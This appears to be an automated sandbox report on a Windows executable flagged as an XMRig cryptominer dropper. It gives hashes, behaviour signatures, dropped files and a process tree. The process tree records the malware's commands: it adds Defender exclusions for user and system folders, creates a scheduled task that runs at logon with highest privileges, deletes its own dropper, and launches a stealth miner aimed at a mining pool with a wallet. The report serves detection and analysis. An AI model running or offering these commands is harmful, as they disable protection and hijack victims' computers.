Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/02/2024, 14:32

General

  • Target

    9becf9a9fbc5feeeefc0a013a431fa88.exe

  • Size

    44KB

  • MD5

    9becf9a9fbc5feeeefc0a013a431fa88

  • SHA1

    e87be13dee4a6fd80d448b93b369856c96e85a25

  • SHA256

    96d3d845d682ba5ff3890c042b2850dd038a845131f771088afd426edfa169b5

  • SHA512

    34e81b067be615fad959c8714a1239907638dcd50c4eb5f8c8a4fe573b9a63a671b63d248312b9599b6c5b37565b4fcba6309256134c5a0d336a6927501847a9

  • SSDEEP

    768:i1m/kO/VJOLdWyxYrgPJ/oWmU+1k/S3LgyzTVq4EqjzzpDl6zoF91jOV:iUOL8yugfr/Ej/VqqdDlsoF91qV

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 10 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\9becf9a9fbc5feeeefc0a013a431fa88.exe
    "C:\Users\Admin\AppData\Local\Temp\9becf9a9fbc5feeeefc0a013a431fa88.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4976
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4768
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\9becf9a9fbc5feeeefc0a013a431fa88.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\9becf9a9fbc5feeeefc0a013a431fa88.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1420
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1784
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2836
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4584
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4512
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4340
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4760
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2056
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                  8⤵
                  • Creates scheduled task(s)
                  PID:640
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:4000
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="kawpow" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=stratum-ravencoin.flypool.org:3333 --user=RTcYpYUzvXcrZMpGVNmMo1brTiJTD81MWs.test --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --no-cpu --cinit-stealth
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1256
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:5116
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 3
                  8⤵
                    PID:4012
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1676
            • C:\Windows\system32\choice.exe
              choice /C Y /N /D Y /T 3
              5⤵
                PID:3176

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

              Filesize

              646B

              MD5

              23867f73ff39fa0dfee6cfb5d3d176ab

              SHA1

              8705a09d38e5f0b034a6f4b4deb5817e312204e1

              SHA256

              f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88

              SHA512

              108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              e3161f4edbc9b963debe22e29658050b

              SHA1

              45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

              SHA256

              1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

              SHA512

              006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              d8cb3e9459807e35f02130fad3f9860d

              SHA1

              5af7f32cb8a30e850892b15e9164030a041f4bd6

              SHA256

              2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

              SHA512

              045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              22310ad6749d8cc38284aa616efcd100

              SHA1

              440ef4a0a53bfa7c83fe84326a1dff4326dcb515

              SHA256

              55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

              SHA512

              2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              77d622bb1a5b250869a3238b9bc1402b

              SHA1

              d47f4003c2554b9dfc4c16f22460b331886b191b

              SHA256

              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

              SHA512

              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              cae60f0ddddac635da71bba775a2c5b4

              SHA1

              386f1a036af61345a7d303d45f5230e2df817477

              SHA256

              b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

              SHA512

              28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              0dcbfef1c28cd8081b1fe48bb10147f0

              SHA1

              26993d9a89a783dd5e121d1327665a2206fed5db

              SHA256

              c04593a35db9a9cd977943cc84c600df1889b2bd74322ad09879449e8976e5fd

              SHA512

              f1b18a99e40871957a0f50ac5c1d9bb55d99d4bbcb23a2ecdbfac6bc8edf25eb68de1f865f8c3777d3f216b73f6408184f6a8cec197d32778d63087cf9275dc3

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ih1w0yna.k2c.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe

              Filesize

              37KB

              MD5

              ffdd033abc1dfaf78851559cdb2f78bc

              SHA1

              fced2cb0cd2766b1dd6d0202db53e1f7fbf36430

              SHA256

              152842a4fd423fe8086c5a4d5165ef0d08bdd989d2b25fe4cddcbe1d4efadfe2

              SHA512

              36290fce15c64db55ecdf2073c136f842ec133da2b4e7da0885aca8b4c6192892213b95dce2479d84744a681299ab67892240be811620daae37307a36012a2ba

            • C:\Windows\System32\Microsoft\Libs\sihost64.exe

              Filesize

              7KB

              MD5

              4e389913d3c35cfe1ccc5eca39757bee

              SHA1

              61439326423207638fa482745e522cbc821d1e7d

              SHA256

              75c3006513cef5e61be3ac23aa814e3d9e474693a689d6a3efd1e1e9e6940a1b

              SHA512

              6cc4a327a5bcc72291e71ceab9f2f66e086185957b1e0b6147692de187e5433f431df6a49d16f2f9cfec29ab7748cbd304a2796d4c07d28fe0177d047495a4e2

            • C:\Windows\System32\services64.exe

              Filesize

              44KB

              MD5

              9becf9a9fbc5feeeefc0a013a431fa88

              SHA1

              e87be13dee4a6fd80d448b93b369856c96e85a25

              SHA256

              96d3d845d682ba5ff3890c042b2850dd038a845131f771088afd426edfa169b5

              SHA512

              34e81b067be615fad959c8714a1239907638dcd50c4eb5f8c8a4fe573b9a63a671b63d248312b9599b6c5b37565b4fcba6309256134c5a0d336a6927501847a9

            • memory/1256-182-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-185-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-181-0x0000000002DF0000-0x0000000002E10000-memory.dmp

              Filesize

              128KB

            • memory/1256-180-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-179-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-178-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-191-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-188-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-186-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-187-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1256-184-0x0000000140000000-0x0000000140786000-memory.dmp

              Filesize

              7.5MB

            • memory/1420-90-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/1420-72-0x00000000004C0000-0x00000000004CE000-memory.dmp

              Filesize

              56KB

            • memory/1420-73-0x0000000000E80000-0x0000000000E92000-memory.dmp

              Filesize

              72KB

            • memory/1420-75-0x0000000000EF0000-0x0000000000EFA000-memory.dmp

              Filesize

              40KB

            • memory/1420-76-0x000000001BFC0000-0x000000001BFD0000-memory.dmp

              Filesize

              64KB

            • memory/1420-74-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/1824-89-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/1824-150-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/1824-153-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/2056-183-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/2056-159-0x0000000003170000-0x0000000003180000-memory.dmp

              Filesize

              64KB

            • memory/2056-158-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/2992-134-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/2992-131-0x0000015DFD570000-0x0000015DFD580000-memory.dmp

              Filesize

              64KB

            • memory/2992-125-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/2992-130-0x0000015DFD570000-0x0000015DFD580000-memory.dmp

              Filesize

              64KB

            • memory/4000-175-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4000-176-0x0000000001EF0000-0x0000000001F00000-memory.dmp

              Filesize

              64KB

            • memory/4000-174-0x0000000000EC0000-0x0000000000EC6000-memory.dmp

              Filesize

              24KB

            • memory/4000-189-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4000-190-0x0000000001EF0000-0x0000000001F00000-memory.dmp

              Filesize

              64KB

            • memory/4144-50-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4144-46-0x00000207D64B0000-0x00000207D64C0000-memory.dmp

              Filesize

              64KB

            • memory/4144-47-0x00000207D64B0000-0x00000207D64C0000-memory.dmp

              Filesize

              64KB

            • memory/4144-45-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4340-149-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4340-147-0x0000017535510000-0x0000017535520000-memory.dmp

              Filesize

              64KB

            • memory/4340-146-0x0000017535510000-0x0000017535520000-memory.dmp

              Filesize

              64KB

            • memory/4340-145-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4344-13-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4344-8-0x00000207EC400000-0x00000207EC422000-memory.dmp

              Filesize

              136KB

            • memory/4344-14-0x00000207EA380000-0x00000207EA390000-memory.dmp

              Filesize

              64KB

            • memory/4344-15-0x00000207EA380000-0x00000207EA390000-memory.dmp

              Filesize

              64KB

            • memory/4344-18-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4512-107-0x000001DBEB1D0000-0x000001DBEB1E0000-memory.dmp

              Filesize

              64KB

            • memory/4512-119-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4512-106-0x000001DBEB1D0000-0x000001DBEB1E0000-memory.dmp

              Filesize

              64KB

            • memory/4512-105-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4584-104-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4584-92-0x000001CB741D0000-0x000001CB741E0000-memory.dmp

              Filesize

              64KB

            • memory/4584-91-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4768-53-0x00000183E3BD0000-0x00000183E3BE0000-memory.dmp

              Filesize

              64KB

            • memory/4768-52-0x00000183E3BD0000-0x00000183E3BE0000-memory.dmp

              Filesize

              64KB

            • memory/4768-51-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4768-65-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4864-34-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4864-27-0x000001CF3BAC0000-0x000001CF3BAD0000-memory.dmp

              Filesize

              64KB

            • memory/4864-20-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4864-21-0x000001CF3BAC0000-0x000001CF3BAD0000-memory.dmp

              Filesize

              64KB

            • memory/4976-0-0x0000000000780000-0x0000000000790000-memory.dmp

              Filesize

              64KB

            • memory/4976-68-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB

            • memory/4976-2-0x00000000031A0000-0x00000000031B0000-memory.dmp

              Filesize

              64KB

            • memory/4976-1-0x00007FFB0D440000-0x00007FFB0DF01000-memory.dmp

              Filesize

              10.8MB